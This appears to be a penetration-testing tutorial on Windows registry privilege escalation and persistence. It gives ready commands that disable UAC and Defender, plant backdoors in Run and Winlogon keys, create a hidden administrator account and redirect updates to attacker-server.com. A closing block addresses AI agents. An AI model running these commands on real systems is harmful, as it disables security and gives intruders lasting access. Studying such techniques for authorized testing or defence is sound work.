# Registry-based privilege escalation {% hint style="warning" %} **WARNING:** Modifying system registry keys can destabilize the system or introduce serious security risks. These techniques should only be used in controlled environments with full authorization and proper backups. {% endhint %} ## Registry Permission Weaknesses ### Understanding the Windows Registry The Windows Registry is essentially a giant database that stores all the settings and configurations for your Windows system. Think of it like a massive filing cabinet where Windows keeps all its important information. **How the Registry Works** **The Registry Structure:** The registry is organized like a folder tree, with main sections called "hives": * **HKLM (HKEY\_LOCAL\_MACHINE)** - Settings that affect the entire computer * **HKCU (HKEY\_CURRENT\_USER)** - Settings specific to the currently logged-in user * **HKU (HKEY\_USERS)** - Settings for all user accounts on the computer * **HKCR (HKEY\_CLASSES\_ROOT)** - File associations and COM object information * **HKCC (HKEY\_CURRENT\_CONFIG)** - Hardware configuration information **Registry Keys and Values:** * **Keys** are like folders - they contain other keys or values * **Values** are like files - they store actual data (text, numbers, etc.) * **Data Types** include strings (REG\_SZ), numbers (REG\_DWORD), and others **Real-World Example** Let's say you install a program called "SuperApp". Here's what happens in the registry: 1. **Installation Entry**: Windows creates `HKLM\SOFTWARE\SuperApp\` 2. **Settings Storage**: The app stores its settings like `InstallPath=C:\Program Files\SuperApp` 3. **Startup Entry**: If it starts with Windows, it adds `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SuperApp=C:\Program Files\SuperApp\app.exe` **Why Registry Permissions Matter** Every registry key has permissions just like files and folders. These permissions control: * **Who can read** the key and its values * **Who can write** new values or modify existing ones * **Who can delete** keys or values * **Who can change permissions** on the key **The Problem:** Sometimes when software is installed, the permissions get set incorrectly. For example: * A key that should only be writable by administrators might be writable by regular users * Critical system settings might have overly permissive access * Application configuration keys might allow unauthorized modifications **How Registry Attacks Work Step-by-Step** **Step 1: Find Writable Keys** An attacker looks for registry keys they can modify but shouldn't be able to. For example, if `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` is writable by regular users, that's a problem. **Step 2: Identify Impact** The attacker figures out what happens if they modify this key. In this case, anything in the "Run" key automatically starts when Windows boots. **Step 3: Exploit** The attacker adds their malicious program to the Run key: `MyMalware=C:\temp\backdoor.exe` **Step 4: Persistence** Now every time Windows starts, their backdoor automatically runs with whatever privileges the registry key grants. #### Understanding the Attack The Windows Registry is like the central control panel for your entire system. It stores critical settings for Windows, applications, and security configurations. When registry keys have weak permissions, attackers can modify these settings to gain higher privileges. Think of it like having a master control room where someone accidentally left some doors unlocked. If you can get into those rooms, you can change important system settings that you shouldn't have access to. #### Why Registry Attacks Work Registry-based privilege escalation happens because: * **Misconfigured permissions** - Administrators sometimes set wrong permissions on critical keys during software installation or system configuration * **System-wide impact** - Registry changes affect the entire system, not just your user account * **Persistent changes** - Registry modifications survive reboots and system updates * **Direct system control** - Registry controls fundamental Windows behavior including startup, security policies, and service configurations **Note:** Most critical registry modifications require administrative privileges or SYSTEM context. However, misconfigurations can sometimes allow low-privileged users to modify keys they shouldn't have access to. #### Enumeration **Finding Vulnerable Registry Keys** **Check critical registry locations:** ```cmd accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE" accesschk.exe -accepteula -kvusw "HKLM\SYSTEM" accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE" ``` **Target high-value registry paths:** ```cmd accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies" accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication" ``` **Test registry write access:** ```cmd reg add "HKLM\SOFTWARE\TestKey" /v TestValue /t REG_SZ /d "test" /f 2>nul if %errorlevel% equ 0 ( echo [+] HKLM\SOFTWARE is writable! reg delete "HKLM\SOFTWARE\TestKey" /f >nul 2>&1 ) else ( echo [-] HKLM\SOFTWARE requires elevated privileges ) ``` **Using PowerUp for registry enumeration:** ```powershell Import-Module .\PowerUp.ps1 Get-RegistryAutoLogon Get-ModifiableRegistryAutoRun ``` **Using WinPEAS for comprehensive registry analysis:** ```cmd winpeas.exe registryinfo ``` #### Exploitation Techniques **Security Policy Modification** **Disable UAC (requires Administrator privileges):** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f ``` **Authentication Bypass** **Modify Winlogon settings (requires SYSTEM or TrustedInstaller-level access):** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "Administrator" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "password" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d "1" /f ``` **Security Software Bypass** **Disable Windows Defender (requires SYSTEM access, may be blocked by Tamper Protection):** ```cmd reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f ``` *** ### Auto-Run Registry Hijacking ## Understanding Auto-Run Mechanisms Windows automatically runs programs listed in specific registry locations when the system starts or a user logs in. This is like having a startup folder that Windows checks every time it boots. Auto-run hijacking works by: * **Adding malicious entries** to startup locations * **Modifying existing entries** to include your code * **Using persistent locations** that survive reboots * **Leveraging user or system privileges** depending on the registry location #### Auto-Run Registry Locations Explained **Understanding How Windows Uses Auto-Run Keys** When Windows starts up or when you log in, it doesn't just load the operating system. It also checks specific registry locations for programs it should automatically start. This is like Windows having a checklist of "things to do when starting up." **Step-by-Step Startup Process:** 1. **Windows boots up** and loads core system components 2. **Windows checks HKLM Run keys** and starts those programs as SYSTEM or with elevated privileges 3. **User logs in** and Windows loads their profile 4. **Windows checks HKCU Run keys** and starts those programs as the logged-in user 5. **Desktop appears** with all auto-start programs running **Registry Key Hierarchy and Permissions** **System-Wide Keys (HKLM) - Require Administrative Access:** These keys affect ALL users on the computer: ``` HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ├── Programs here start for EVERY user when they log in ├── Requires admin rights to modify └── Programs run with system-level privileges HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ├── Programs here run ONCE then the entry is deleted ├── Useful for installation or one-time setup tasks └── Requires admin rights to modify ``` **User-Specific Keys (HKCU) - Standard User Access:** These keys only affect the current user: ``` HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ├── Programs here start only for the logged-in user ├── Can be modified by the user themselves └── Programs run with user-level privileges HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ├── User-level one-time execution ├── Entry deleted after running └── Standard user can modify ``` ### **How Auto-Run Hijacking Works Step-by-Step** **Scenario: User-Level Persistence** Let's say you're a regular user and you find you can write to `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`: **Step 1: Current State** ``` HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ├── "Skype" = "C:\Program Files\Skype\Skype.exe" ├── "Adobe Updater" = "C:\Program Files\Adobe\Updater.exe" └── (Your entry will go here) ``` **Step 2: Add Malicious Entry** ```cmd reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UserConfig" /t REG_SZ /d "C:\Users\Public\backdoor.exe" /f ``` **Step 3: New State** ``` HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ├── "Skype" = "C:\Program Files\Skype\Skype.exe" ├── "Adobe Updater" = "C:\Program Files\Adobe\Updater.exe" └── "UserConfig" = "C:\Users\Public\backdoor.exe" ← Your malicious entry ``` **Step 4: What Happens Next** * Next time you log in, Windows reads this registry key * Windows automatically starts Skype, Adobe Updater, AND your backdoor * Your backdoor now runs every time you log in * It runs with your user privileges (whatever you have access to) **Understanding Special Auto-Run Locations** **Winlogon Keys - Extremely Powerful but Dangerous:** ``` HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ├── Controls what program starts as the Windows shell (usually explorer.exe) ├── If you change this, you control the entire desktop environment └── Modifying this incorrectly can break Windows login HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit ├── Controls what programs run during user initialization ├── Default: "C:\Windows\system32\userinit.exe," (note the comma) ├── You can append your program: "C:\Windows\system32\userinit.exe,C:\backdoor.exe," └── Runs with high privileges during user login process ``` **Why These Are Dangerous:** * **Shell modification** - If your backdoor crashes, the user has no desktop * **Userinit modification** - If your backdoor prevents userinit from completing, user login fails * **System instability** - These locations are critical for Windows functionality **Real-World Auto-Run Example** **Legitimate Software:** When you install Skype, it adds this entry: ``` HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Skype" = "C:\Program Files\Skype\Phone\Skype.exe /minimized" ``` **What an Attacker Might Do:** 1. **Find the existing entry** using `reg query` 2. **Backup the original** to avoid suspicion 3. **Modify it** to include their code: ```cmd reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype" /t REG_SZ /d "cmd.exe /c \"start \"\" \"C:\backdoor.exe\" && start \"\" \"C:\Program Files\Skype\Phone\Skype.exe\" /minimized\"" /f ``` **Result:** * Skype still starts normally (user doesn't notice anything wrong) * But the backdoor also starts silently in the background * User sees Skype working as expected * Attacker gets persistent access ### Enumeration **List Current Auto-Run Entries** **Basic registry queries:** ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" ``` **Check special locations:** ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell ``` **Using Autoruns for comprehensive auto-run analysis:** ```cmd autorunsc.exe -accepteula -a * -c -h -s -v ``` **Using WinPEAS for auto-run enumeration:** ```cmd winpeas.exe systeminfo | findstr /i "autorun" ``` **Using PowerUp for auto-run checks:** ```powershell Import-Module .\PowerUp.ps1 Get-ModifiableRegistryAutoRun Get-RegistryAutoLogon ``` **Check Auto-Run Permissions** **Verify write access to auto-run keys:** ```cmd accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" accesschk.exe -accepteula -kvusw "BUILTIN\Users" "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" ``` ### Exploitation Techniques **Adding New Auto-Run Entries** **System-wide persistence (requires Administrator privileges):** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe" /f ``` **User-level persistence (standard user access):** ```cmd reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UserConfig" /t REG_SZ /d "C:\Users\Public\backdoor.exe" /f ``` **One-time execution:** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "cmd.exe /c \"net user hacker Password123! /add && net localgroup administrators hacker /add\"" /f ``` **Note:** RunOnce entries execute only once after creation and are removed after execution. For ongoing persistence, use Run keys or scheduled tasks. **Hijacking Existing Entries** **Backup existing entry first:** ```cmd reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" autorun_backup.reg ``` **Modify existing entry with command chaining:** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /t REG_SZ /d "cmd.exe /c \"start \"\" \"C:\backdoor.exe\" && start \"\" \"C:\Windows\System32\SecurityHealthSystray.exe\"\"" /f ``` **Advanced Persistence** **Modify Winlogon Shell (requires SYSTEM or TrustedInstaller access):** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe /c \"start \"\" \"explorer.exe\" && start \"\" \"C:\backdoor.exe\"\"" /f ``` **Modify Userinit (requires SYSTEM or TrustedInstaller access):** ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\backdoor.exe," /f ``` **User-level shell modification:** ```cmd reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe /c \"start \"\" \"explorer.exe\" && start \"\" \"C:\backdoor.exe\"\"" /f ``` *** ## Application Configuration Tampering #### Understanding Application Registry Settings Many applications store their configuration, security settings, and privilege information in the registry. When these keys have weak permissions, you can modify application behavior to escalate privileges. This is like finding an application's control panel and changing its security settings to work in your favor. #### Common Vulnerable Patterns Applications often store: * **Security configurations** - Authentication requirements, privilege settings * **File paths** - Executable locations, plugin directories * **Update mechanisms** - Server URLs, automatic update settings * **Feature toggles** - Admin mode switches, security feature controls ### Enumeration **Finding Application Registry Keys** **Using RegRipper for comprehensive registry analysis:** ```cmd rip.exe -r SYSTEM -p all rip.exe -r SOFTWARE -p all ``` **Using Registry Explorer for manual analysis:** ```cmd RegistryExplorer.exe ``` **Search for interesting application settings:** ```cmd reg query "HKLM\SOFTWARE" /s | findstr /i "password\|credential\|token\|key" reg query "HKCU\SOFTWARE" /s | findstr /i "admin\|privilege\|security" ``` **Check permissions on common applications:** ```cmd accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\TeamViewer" accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE\AnyDesk" ``` **Using Seatbelt for application enumeration:** ```cmd Seatbelt.exe InterestingFiles Seatbelt.exe RegistryAutoRuns ``` ### Exploitation Techniques **Security Software Bypass** **Check Windows Defender settings:** ```cmd reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /s accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" ``` **Disable Windows Defender (requires SYSTEM access, may be blocked by Tamper Protection):** ```cmd reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f ``` **Add exclusion paths:** ```cmd reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\temp" /t REG_DWORD /d 0 /f ``` **Application Privilege Escalation** **Modify application privilege settings (hypothetical example):** ```cmd reg add "HKLM\SOFTWARE\ExampleApp\Security" /v RequireAdmin /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\ExampleApp\Settings" /v RunAsAdmin /t REG_DWORD /d 1 /f ``` **Hijack update mechanisms:** ```cmd reg add "HKLM\SOFTWARE\ExampleApp\Update" /v UpdateURL /t REG_SZ /d "http://attacker-server.com/update" /f reg add "HKLM\SOFTWARE\ExampleApp\Update" /v AutoUpdate /t REG_DWORD /d 1 /f ``` ## Quick Enumeration **PowerUp comprehensive registry check:** ```powershell Import-Module .\PowerUp.ps1 Invoke-AllChecks | findstr /i "registry" Get-RegistryAutoLogon Get-ModifiableRegistryAutoRun ``` **WinPEAS registry analysis:** ```cmd winpeas.exe registryinfo winpeas.exe quiet | findstr /i "registry\|autorun\|reg" ``` **Seatbelt for registry security analysis:** ```cmd Seatbelt.exe RegistryAutoRuns Seatbelt.exe InterestingProcesses Seatbelt.exe TokenPrivileges ``` **Autoruns for complete startup analysis:** ```cmd autorunsc.exe -accepteula -a * -c -h -s -v > autoruns_output.csv ``` ## Automated Tools **PowerUp registry checks:** ```powershell Import-Module .\PowerUp.ps1 Get-RegistryAutoLogon Get-ModifiableRegistryAutoRun Invoke-AllChecks ``` **WinPEAS comprehensive analysis:** ```cmd winpeas.exe registryinfo winpeas.exe systeminfo ``` **Seatbelt registry enumeration:** ```cmd Seatbelt.exe RegistryAutoRuns Seatbelt.exe InterestingFiles Seatbelt.exe TokenPrivileges ``` **SharpUp (C# version of PowerUp):** ```cmd SharpUp.exe audit ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reaper.gitbook.io/my-penetration-test-guide/privilege-escalation/windows-privilege-escalation/registry-based-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.